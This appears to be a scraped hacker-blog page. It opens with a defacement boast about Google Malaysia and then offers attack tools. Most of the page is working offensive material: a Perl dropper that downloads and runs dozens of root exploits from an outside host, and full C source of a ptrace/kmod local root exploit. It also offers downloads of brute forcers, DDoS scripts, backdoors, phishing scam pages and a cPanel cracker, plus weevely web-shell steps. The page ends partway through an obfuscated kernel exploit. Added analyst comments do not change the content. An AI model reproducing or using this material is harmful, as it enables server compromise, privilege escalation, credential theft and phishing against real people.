Google.com.my Hacked By 1337 (Madleets hacker Team)

Google hacked By Palestani hacker (1337)
Site Hacked :
 www.google.com.my
 www.google.my
 mirror
 http://www.zone-h.com/mirror/id/20957809
 http://www.zone-h.com/mirror/id/20957806
 Screenshot :
   
Video :
 http://www.youtube.com/watch?v=OYUR19t6jt8




[!] Struck by 1337

Google Malaysia STAMPED by PAKISTANI LEETS

We are TeaM MADLEETS

H4x0r HuSY - KhantastiC HaXor - H4x0rL1f3 - InvectuS - Shadow008 - r00x - Don - MindCracker - Dr.Z0mbie - phpBuGz - MaD GirL
MaDCoDe - Sn!p3r_GS - DeXter - Neo Haxor - Darksnipper - Pain006 - b0x - R3DL0F - Sahrawi - 3thicaln00b - Hmei7 - MakMan - Sniffer - AL.MaX HaCkEr - Ch3rn0by1
=======================
www.MaDLeeTs.com
| LeeTHaXor@Y7mail.com |
=======================
Pakistan Zindabad


Auto Root linux server 2010-2011-2012






#!/usr/bin/perl

# Analyst summary (comments added for review; the code below is unchanged).
#
# The script is a linear dropper. For every entry it shells out four times:
#   wget http://www.oco.cc/root/<name>  - fetch a file over plain HTTP into the
#                                         current working directory
#   chmod 777 <name>                    - make it readable/writable/executable
#                                         for every local user
#   ./<name>                            - run it
#   id                                  - print the uid/gid seen by a new child
# No return value of system() is inspected, so each stage runs whether or not
# the previous one succeeded. What the fetched files do is not visible in this
# listing; the banner and the file names suggest local privilege-escalation
# attempts against 2.6.x kernels (assumption from names only).
#
# Traits visible in the code that matter for detection and triage:
#   - one interpreter process spawning a long, regular sequence of
#     wget / chmod 777 / exec-from-cwd / id child processes
#   - repeated outbound HTTP requests to a single host and path prefix
#     (www.oco.cc, /root/)
#   - freshly created mode-777 executables in whatever directory the script
#     was started from, removed again by the rm run at the end

print "######################################################\n";
print "# Auto Rooting ******* For Linux #\n";
print "# Margu Local Root 2011 2012 For Linux #\n";
print "# Version: 1.0 #\n";
print "######################################################\n";
{
# Prints kernel release/architecture once before the download loop starts.
system("uname -a");
system("wget http://www.oco.cc/root/1-2");
system("chmod 777 1-2");
system("./1-2");
system("id");
system("wget http://www.oco.cc/root/1-3");
system("chmod 777 1-3");
system("./1-3");
system("id");
system("wget http://www.oco.cc/root/1-4");
system("chmod 777 1-4");
system("./1-4");
system("id");
system("wget http://www.oco.cc/root/2");
system("chmod 777 2");
system("./2");
system("id");
system("wget http://www.oco.cc/root/2-1");
system("chmod 777 2-1");
system("./2-1");
system("id");
system("wget http://www.oco.cc/root/2-6-32-46-2011");
system("chmod 777 2-6-32-46-2011");
system("./2-6-32-46-2011");
system("id");
system("wget http://www.oco.cc/root/2-6-37");
system("chmod 777 2-6-37");
system("./2-6-37");
system("id");
system("wget http://www.oco.cc/root/2.6.18-6-x86-2011");
system("chmod 777 2.6.18-6-x86-2011");
system("./2.6.18-6-x86-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.18-164-2010");
system("chmod 777 2.6.18-164-2010");
system("./2.6.18-164-2010");
system("id");
system("wget http://www.oco.cc/root/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
system("wget http://www.oco.cc/root/2.6.18-194.1-2010");
system("chmod 777 2.6.18-194.1-2010");
system("./2.6.18-194.1-2010");
system("id");
system("wget http://www.oco.cc/root/acid");
system("chmod 777 acid");
system("./acid");
system("id");
system("wget http://www.oco.cc/root/2.6.18-194.2-2010");
system("chmod 777 2.6.18-194.2-2010");
system("./2=2.6.18-194.2-2010");
system("id");
system("wget http://www.oco.cc/root/2.6.18-274-2011");
system("chmod 777 2.6.18-274-2011");
system("./2.6.18-274-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.18-374.12.1.el5-2012");
system("chmod 777 2.6.18-374.12.1.el5-2012");
system("./2.6.18-374.12.1.el5-2012");
system("id");
system("wget http://www.oco.cc/root/2.6.28-2011");
system("chmod 777 2.6.28-2011");
system("./2.6.28-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.32-46.1.BHsmp");
system("chmod 777 2.6.32-46.1.BHsmp");
system("./2.6.32-46.1.BHsmp");
system("id");
system("wget http://www.oco.cc/root/2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.oco.cc/root/2.6.33-2011");
system("chmod 777 2.6.33-2011");
system("./2.6.33-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
system("id");
system("wget http://www.oco.cc/root/2.6.34-2011Exploit2");
system("chmod 777 2.6.34-2011Exploit2");
system("./2.6.34-2011Exploit2");
system("id");
system("wget http://www.oco.cc/root/2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.oco.cc/root/2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.oco.cc/root/2.34-2011Exploit1");
system("chmod 777 2.34-2011Exploit1");
system("./2.34-2011Exploit1");
system("id");
system("wget http://www.oco.cc/root/3");
system("chmod 777 3");
system("./3");
system("id");
system("wget http://www.oco.cc/root/4");
system("chmod 777 4");
system("./4");
system("id");
system("wget http://www.oco.cc/root/5");
system("chmod 777 5");
system("./5");
system("id");
system("wget http://www.oco.cc/root/6");
system("chmod 777 6");
system("./6");
system("id");
system("wget http://www.oco.cc/root/7");
system("chmod 777 7");
system("./7");
system("id");
system("wget http://www.oco.cc/root/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
system("wget http://www.oco.cc/root/7x");
system("chmod 777 7x");
system("./7x");
system("id");
system("wget http://www.oco.cc/root/8");
system("chmod 777 8");
system("./8");
system("id");
system("wget http://www.oco.cc/root/9");
system("chmod 777 9");
system("./9");
system("id");
system("wget http://www.oco.cc/root/10");
system("chmod 777 10");
system("./10");
system("id");
system("wget http://www.oco.cc/root/11");
system("chmod 777 11");
system("./11");
system("id");
system("wget http://www.oco.cc/root/13x");
system("chmod 777 13x");
system("./13x");
system("id");
system("wget http://www.oco.cc/root/14");
system("chmod 777 14");
system("./14");
system("id");
system("wget http://www.oco.cc/root/15.sh");
system("chmod 777 15.sh");
system("./15.sh");
system("id");
system("wget http://www.oco.cc/root/16");
system("chmod 777 16");
system("./16");
system("id");
system("wget http://www.oco.cc/root/16-1");
system("chmod 777 16-1");
system("./16-1");
system("id");
system("wget http://www.oco.cc/root/18");
system("chmod 777 18");
system("./18");
system("id");
system("wget http://www.oco.cc/root/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
system("wget http://www.oco.cc/root/31");
system("chmod 777 31");
system("./31");
system("id");
system("wget http://www.oco.cc/root/36-rc1");
system("chmod 777 36-rc1");
system("./36-rc1");
system("id");
system("wget http://www.oco.cc/root/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://www.oco.cc/root/15150");
system("chmod 777 15150");
system("./15150");
system("id");
system("wget http://www.oco.cc/root/15200");
system("chmod 777 15200");
system("./15200");
system("id");
system("wget http://www.oco.cc/root/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
system("wget http://www.oco.cc/root/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
system("wget http://www.oco.cc/root/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
system("wget http://www.oco.cc/root/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
system("wget http://www.oco.cc/root/full-nelson");
system("chmod 777 full-nelson");
system("./full-nelson");
system("id");
system("wget http://www.oco.cc/root/gayros");
system("chmod 777 gayros");
system("./gayros");
system("id");
system("wget http://www.oco.cc/root/lenis.sh");
system("chmod 777 lenis.sh");
system("./lenis.sh");
system("id");
system("wget http://www.oco.cc/root/local-root-exploit-gayros");
system("chmod 777 local-root-exploit-gayros");
system("./local-root-exploit-gayros");
system("id");
system("wget http://www.oco.cc/root/pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
system("wget http://www.oco.cc/root/root1");
system("chmod 777 root1");
system("./root1");
system("id");
system("wget http://www.oco.cc/root/root.py");
system("chmod 777 root.py");
system("./root.py");
system("id");
system("wget http://www.oco.cc/root/runx");
system("chmod 777 runx");
system("./runx");
system("id");
system("wget http://www.oco.cc/root/tivoli");
system("chmod 777 tivoli");
system("./tivoli");
system("id");
system("wget http://www.oco.cc/root/ubuntu");
system("chmod 777 ubuntu");
system("./ubuntu");
system("id");
system("wget http://www.oco.cc/root/vmsplice-local-root-exploit");
system("chmod 777 vmsplice-local-root-exploit");
system("./z1d-2011");
system("id");
system("wget http://www.oco.cc/root/z1d-2011");
system("chmod 777 z1d-2011");
system("./z1d-2011");
system("id");
system("whoami");
# Cleanup run: deletes the downloaded files from the current directory, plus
# exploit.conf and a.c, which this script never fetched itself (presumably
# left behind by one of the downloaded programs). On a compromised host the
# files may therefore be gone from disk while the wget/exec activity is still
# recoverable from process-accounting, audit, proxy or DNS logs.
system("rm 1-2");
system("rm 1-3");
system("rm 1-4");
system("rm 2");
system("rm 2-1");
system("rm 2-6-32-46-2011");
system("rm 2-6-37");
system("rm 2.6.18-6-x86-2011");
system("rm 2.6.18-164-2010");
system("rm 2.6.18-194");
system("rm 2.6.18-194.1-2010");
system("rm acid");
system("rm 2.6.18-194.2-2010");
system("rm 2.6.18-274-2011");
system("rm 2.6.18-374.12.1.el5-2012");
system("rm 2.6.28-2011");
system("rm 2.6.32-46.1.BHsmp");
system("rm 2.6.33");
system("rm 2.6.33-2011");
system("rm 2.6.34-2011Exploit1");
system("rm 2.6.34-2011Exploit2");
system("rm 2.6.37");
system("rm 2.6.37-rc2");
system("rm 2.34-2011Exploit1");
system("rm 3");
system("rm 4");
system("rm 5");
system("rm 6");
system("rm 7");
system("rm 7-2");
system("rm 7x");
system("rm 8");
system("rm 9");
system("rm 10");
system("rm 11");
system("rm 13x");
system("rm 14");
system("rm 15.sh");
system("rm 16");
system("rm 16-1");
system("rm 18");
system("rm 18-5");
system("rm 31");
system("rm 36-rc1");
system("rm 44");
system("rm 15150");
system("rm 15200");
system("rm exp1");
system("rm exp2");
system("rm exp3");
system("rm exploit");
system("rm full-nelson");
system("rm gayros");
system("rm lenis.sh");
system("rm local-root-exploit-gayros");
system("rm pwnkernel");
system("rm root1");
system("rm root.py");
system("rm runx");
system("rm tivoli");
system("rm ubuntu");
system("rm vmsplice-local-root-exploit");
system("rm z1d-2011");
system("rm exploit.conf");
system("rm a.c");
print "######################################################\n";
print "# Auto Rooting ******* For Linux #\n";
print "# Margu Local Root 2011 2012 For Linux #\n";
print "# Version: 1.0 #\n";
print "######################################################\n";
print "                     :) \n";
}

Metasploit Portable v2




+ -- --=[ MSF 3.2 Portable v2
      
[*]Changelog/Features:
   [+]Best pack and unpack
   [+]Command line support
   [+]GTK Theme selector
   [+]Links to use extra tools
   [+]Use only Console
   [+]Build a updated and config version
   [-]Encrypt all files

[*]Command line:
   /update   -> Update MSF Core
   /tools    -> Add extra tools to desktop
   /themes   -> Execute GTK theme selector
   /gui      -> Run GUI
   /web      -> Run Web
   /konsole  -> Run Console
   /build    -> Build a update
   /S        -> Silent

  usage:
   MSF 3.2p v2 Full.exe /update /gui /build /S
   MSF 3.2p v2 Full.exe /update /build /S
   MSF 3.2p v2 Full.exe /konsole /S
   etc....!

[*]Versions:
   MSF 3.2p v2      -> Web and GUI
   MSF 3.2p v2 Full   -> Web, GUI and Console
   MSF 3.2p v2 Lite   -> Console

[*]Extra tools:
   Putty
   VNCViewer
   WinVI
   RUBY Shell
   NASM Shell
   Netcat
   Cygwin   




Download : here


PERL scripts mega Collections For Hacking


List :

1. GMail brute
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan - Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. netBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Versão 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL - Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. bluetooth hacking tool
57. SQL insertion crawler
58. binary scanner
59. POP3 Crack (bruteforce)
60. openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
70. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server's list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. connect and send commands to remote iport. the tor network is used for anonymity.
106. port scanner sweeper.
107. rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IPs of visitors
109. Directory revealer
110. IIS Scanner 2012
111. UDP Flooder
112. MD5 Cracker
113. MD5::Reverse
114. wordlist tool by mousepad

Download : Here

Hotmail Crack


Download filenya : Disini
cara pakai :
buka CMD lalu ketik perintah berikut :

cd /hotmail 

hotmail.py -u victim@hotmail.com -w hotmail.txt

*hotmail.txt = password list


ENJOY IT 



XCodeXploitScanner SQL,XSS,RFI,LFI




Status: Clean.
Total Results: 0/35
AVG Free- Clean.
ArcaVir-Clean.
Avast 5-Clean.
AntiVir (Avira)- Clean.
BitDefender- Clean.
VirusBuster Internet Security- Clean.
Clam Antivirus- Clean.
COMODO Internet Security- Clean.
Dr.Web- Clean.
eTrust-Vet- Clean.
F-PROT Antivirus- Clean.
F-Secure Internet Security- Clean.
G Data- Clean.
IKARUS Security- Clean..
Kaspersky Antivirus-Clean.
McAfee-Clean.
MS Security Essentials- Clean.
ESET NOD32- Clean.
Norman- Clean.
Norton Antivirus-Clean.
Panda Security-Clean.
A-Squared- Clean.
Quick Heal Antivirus- Clean.
Solo Antivirus-Clean.
Sophos-Clean.
Trend Micro Internet Security-Clean.
VBA32 Antivirus- Clean.
Vexira Antivirus-Clean.
Zoner AntiVirus-Clean.
Ad-Aware-Clean.
BullGuard- Clean.
Immunet Antivirus- Clean.
K7 Ultimate- Clean.
NANO Antivirus- Clean.
VIPRE-Clean.


Download Link => Xcode




[ PRIVATE ] CPANEL CRACKER 2013

oke, kali ini saya akan berbagi TUT cpanel cracker, 100% work
pertama download tools ini => DISINI
(pastikan anda sudah menginstall tool python)

rar pass = www.ilyas-cyber4rt.com
Ikuti lagkah langkah berikut :


* Upload killer.php
* Upload cp.php
*buka killer.php (liat gambar)

                 





 * simpan cp.py di local disk c :
 * buka cmd, dan ketik perintah
    - cd \

    - cp.py [URL CONFIG] c:[folder data penyimpanan config] (liat gambar)
   




* Copy semua password list yg dilayar cmd anda
* Buka cp.php
* Lalu paste password listnya, dan klik start (liat gambar)




                                         

DONE !!
  SEMOGA BERMANFAAT !! :)

All Scam Pages(PayPal , Skype ,Ebay , Facebook,Gmail ,Yahoo Etc

screenshot :




Silahkan disedot gan, mumpung masih hangat  :D
download
 here

ENJOY !!



cara mudah backconnect

pertama download tools ini :

weevely  :
donlot disini
python :
donlot disini
python read line :
donlot disini :) 

 extract weevely di (local dick: c )

buka cmd lalu ketik perintah berikut :
main.py -g -o namashell.php -p password
contoh : main.py -g -o x.php -p ilyas



                                          





lalu upload shell yg dibuat tadi ke web anda 

                                                                                                

                                     


sekarang ketik perintah berikut :
main.py -t -u http://target.com/x.php -p ilyas





                                     



SEMOGA BERMANFAAT :)

WHOAMI ?


Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit


#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

/*
 * Opaque machine-code payload. putcode() copies these bytes, followed by
 * this program's own executable path, into the traced process. The bytes
 * are not decoded in this listing; treat the array as data.
 */
char cliphcode[] =
    "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
    "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
    "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
    "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
    "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

/* Payload length without the string literal's terminating NUL. */
#define CODE_SIZE (sizeof(cliphcode) - 1)

/*
 * PIDs shared between main(), the forked child and the signal handlers.
 * They start at 1 and are overwritten in main() and do_child(); fatal()
 * sends SIGKILL to whatever values they hold when it is called.
 */
pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
/* Incremented on every SIGCHLD; sigchld() only acts from the second one on. */
volatile int gotchild = 0;

/*
 * Report an error and kill the processes this program tracks.
 *
 * Prints msg via perror(), so the suffix depends on errno at the call site,
 * then sends SIGKILL to the PIDs stored in the globals parent, child and
 * victim. There is no exit() here: the function returns to its caller unless
 * one of those signals terminates the calling process. The return values of
 * kill() are ignored.
 */
void fatal(char * msg)
{
    perror(msg);
    kill(parent, SIGKILL);
    kill(child, SIGKILL);
    kill(victim, SIGKILL);
}

/*
 * Write the payload, followed by this program's own executable path, into
 * the address space of the traced process `victim`, starting at dst.
 *
 * dst is an address inside the traced process; it is only handed to
 * ptrace() and never dereferenced in this process.
 *
 * Analyst note: the visible effect is a series of PTRACE_POKETEXT requests
 * from one unprivileged process against another. Syscall auditing of
 * ptrace() records exactly this pattern.
 */
void putcode(unsigned long * dst)
{
    /* Sized for the payload plus a path of up to MAXPATHLEN bytes. */
    char buf[MAXPATHLEN + CODE_SIZE];
    unsigned long * src;
    int i, len;

    memcpy(buf, cliphcode, CODE_SIZE);
    /* readlink() does not NUL-terminate; a terminator is stored below. */
    len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
    if (len == -1)
        fatal("[-] Unable to read /proc/self/exe");

    /* Extend len past the payload and the path, then store a NUL at that index. */
    len += CODE_SIZE + 1;
    buf[len] = '\0';
     
    /*
     * One unsigned long is transferred per ptrace() call while the byte
     * counter advances by 4 - presumably written for 32-bit x86, where
     * unsigned long is 4 bytes (the use of regs.eip elsewhere in the file
     * points the same way); TODO confirm for the build target.
     */
    src = (unsigned long*) buf;
    for (i = 0; i < len; i += 4)
        if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
            fatal("[-] Unable to write shellcode");
}

/*
 * SIGCHLD handler installed by do_child().
 *
 * The first delivery only bumps gotchild and returns. On any later delivery
 * the handler reads the traced process's registers, overwrites memory at its
 * current instruction pointer (regs.eip) via putcode(), detaches from it and
 * exits the calling process with status 0.
 *
 * signo is unused. Note that fprintf() and exit() are called from signal
 * context, which is outside the async-signal-safe set.
 */
void sigchld(int signo)
{
    struct user_regs_struct regs;

    /* Post-increment: true only for the very first SIGCHLD. */
    if (gotchild++ == 0)
        return;
     
    fprintf(stderr, "[+] Signal caught\n");

    if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
        fatal("[-] Unable to read registers");
     
    fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
     
    /* The write target is wherever the traced process is about to execute. */
    putcode((unsigned long *)regs.eip);

    fprintf(stderr, "[+] Now wait for suid shell...\n");

    if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
        fatal("[-] Unable to detach from victim");

    exit(0);
}

/*
 * SIGALRM handler: acts as the timeout for the whole attempt.
 * main() arms a 10-second alarm; if it fires, errno is forced to ECANCELED
 * so that perror() inside fatal() prints a fixed reason, and the tracked
 * processes are killed. signo is unused.
 */
void sigalrm(int signo)
{
    errno = ECANCELED;
    fatal("[-] Fatal error");
}

/*
 * Body of the forked child: attach to another process with ptrace and let
 * the SIGCHLD handler do the rest.
 *
 * The target PID is not discovered but assumed: victim is set to this
 * process's own PID plus one. Which process that is meant to be is not
 * visible here - presumably the next process created on the system after
 * the fork; TODO confirm against the vulnerability write-up.
 *
 * The function never returns: it ends in an endless busy loop and relies on
 * sigchld() or fatal() to terminate the process.
 */
void do_child(void)
{
    int err;

    child = getpid();
    victim = child + 1;

    signal(SIGCHLD, sigchld);

    /* Retry for as long as the assumed PID does not exist yet (ESRCH). */
    do
        err = ptrace(PTRACE_ATTACH, victim, 0, 0);
    while (err == -1 && errno == ESRCH);

    if (err == -1)
        fatal("[-] Unable to attach");

    fprintf(stderr, "[+] Attached to %d\n", victim);
    /* Busy-wait until the first SIGCHLD has been counted by sigchld(). */
    while (!gotchild) ;
    if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
        fatal("[-] Unable to setup syscall trace");
    fprintf(stderr, "[+] Waiting for signal\n");

    /* Spin; the next SIGCHLD runs sigchld(), which exits the process. */
    for(;;);
}

/*
 * Body of the parent process.
 *
 * progname is argv[0] of this program. The function issues one socket()
 * call whose result is discarded, then polls stat(progname) until the file
 * carries the set-uid bit, cancels the pending alarm and re-runs the program
 * through system().
 *
 * The socket() call uses AF_SECURITY with protocol 1 and ignores the return
 * value, so only its side effect matters - presumably a kernel module
 * auto-load request (the "kmod" in the page title); TODO confirm.
 *
 * Analyst note: success shows up on disk as this program's own binary
 * gaining the set-uid bit. File-integrity monitoring that alerts on new
 * set-uid files in user-writable locations covers that step.
 */
void do_parent(char * progname)
{
    struct stat st;
    int err;
    errno = 0;
    socket(AF_SECURITY, SOCK_STREAM, 1);
    /* Tight polling loop with no sleep; bounded only by the 10 s alarm. */
    do {
        err = stat(progname, &st);
    } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
     
    if (err == -1)
        fatal("[-] Unable to stat myself");

    /* alarm(0) cancels the timeout armed in main(). */
    alarm(0);
    /* Re-executes this binary; prepare() in the new instance checks euid. */
    system(progname);
}

/*
 * Second-stage entry check, called first thing in main().
 *
 * If the effective uid is already 0, the process sets root's supplementary
 * groups, gid and uid and replaces itself with the system shell
 * (_PATH_BSHELL). Otherwise the function returns without doing anything and
 * main() continues with the fork/ptrace stage.
 *
 * The return values of initgroups(), setgid() and setuid() are not checked;
 * fatal() is reached only if execl() itself fails.
 */
void prepare(void)
{
    if (geteuid() == 0) {
        initgroups("root", 0);
        setgid(0);
        setuid(0);
        execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
        fatal("[-] Unable to spawn shell");
    }
}

/*
 * Entry point.
 *
 * Order of operations: prepare() (spawns a shell and never returns when
 * already running with euid 0), arm a 10-second SIGALRM timeout, fork, then
 * run do_child() in the child and do_parent() in the parent.
 *
 * argc is unused; argv[0] is passed on as the path that do_parent() stats
 * and re-executes.
 */
int main(int argc, char ** argv)
{
    prepare();
    signal(SIGALRM, sigalrm);
    alarm(10);
     
    parent = getpid();
    child = fork();
    /* In the parent this is the forked child's PID + 1; do_child() recomputes it. */
    victim = child + 1;
     
    if (child == -1)
        fatal("[-] Unable to fork");

    if (child == 0)
        do_child();
    else
        do_parent(argv[0]);

    return 0;
}

linux kernel 2.6.18-194 & 2.6.18-294 2010 exploit


#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h> 
#include <sys/msg.h>
#include <errno.h>


/*
 * Build guard and name table.
 *
 * The file refuses to compile unless __i386__ is defined. The #else branch
 * opened here is not closed within this excerpt.
 *
 * Many identifiers below are deliberately scrambled. The three aliases that
 * follow are plain renames and are the key to reading the rest of the file:
 *   __dgdhdytrg55            -> unsigned int
 *   __yyrhdgdtfs66ytgetrfd   -> unsigned long long
 *   __dhdyetgdfstreg__       -> memcpy
 * _GNU_SOURCE is defined after the #include lines that precede this block.
 */
#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!#@#"
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

/* ANSI colour escapes used for the start-up banner. */
#define VERT                  "\033[32m"
#define NORM                  "\033[0m"
#define BANNER                VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"

/*
 * Files and kernel symbol names the program refers to. For triage these are
 * the readable strings in a compiled copy: /proc/kallsyms, /proc/timer_list,
 * /selinux/enforce and the credential-related symbol names.
 */
#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
/* Fixed low addresses and a page size; their use lies outside this excerpt. */
#define Y0Y0SMAP              0x100000UL
#define Y0Y0CMAP              0x200000UL
#define Y0Y0STOP              (Y0Y0SMAP+0xFFC)
#define J0J0S                 0x00200000UL
#define J0J0R00T              0x002000F0UL
#define PAGE_SIZE             0x1000

/*
 * Bit flags stored in the file-scope variable `flags`. Only
 * KERN_HHSYPPLORQTWGFD (0x4) is read in this excerpt: get_sym_ex() uses it
 * to gate symbol lookups.
 */
#define KERN_DHHDYTMLADSFPYT     0x1
#define KERN_DGGDYDTEGGETFDRLAK  0x2
#define KERN_HHSYPPLORQTWGFD     0x4 


#define KERN_DIS_GGDYYTDFFACVFD_IDT      0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS     0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM      0x20

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40

/* True when the kernel release string contains ".el4" or ".el5". */
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))

#define TRY_REMAP_DEFAULT 1

/*
 * Output helpers: formatted print to stdout, plain string to stdout,
 * perror()+exit(-1), and fprintf(stderr)+exit(-1). The last one passes its
 * argument as the format string itself.
 */
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

/*
 * File-scope state. Within this excerpt only flags, _m_cred, krelease and
 * kversion are referenced (by get_sym_ex(), parse_cred() and
 * lsm_rhel_find_target()); the remaining variables are used by code that is
 * not shown.
 */
static char buffer[1024];
static int s;
/* Bitmask of the KERN_* values defined earlier in the file. */
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
/* _m_cred[0..2] are filled from a comma-separated hex string by parse_cred(). */
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
/* Kernel release and version strings compared against known_targets[]. */
static char krelease[64];
static char kversion[128];

/*
 * Machine-code templates and the byte offsets at which they get patched.
 *
 * The arrays are opaque data in this listing and are not decoded here.
 * Each *_OFF style macro indexes a filler run inside the array that follows
 * it (repeated 0x41, 0x42 or 0x43 bytes, or a four-byte zero field), i.e.
 * the places where real values are written at run time. Within this excerpt
 * only p4tch_sel1nux_codztegfaddczda() performs such writes; the code that
 * fills the other templates is not shown.
 */
#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"  
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"   
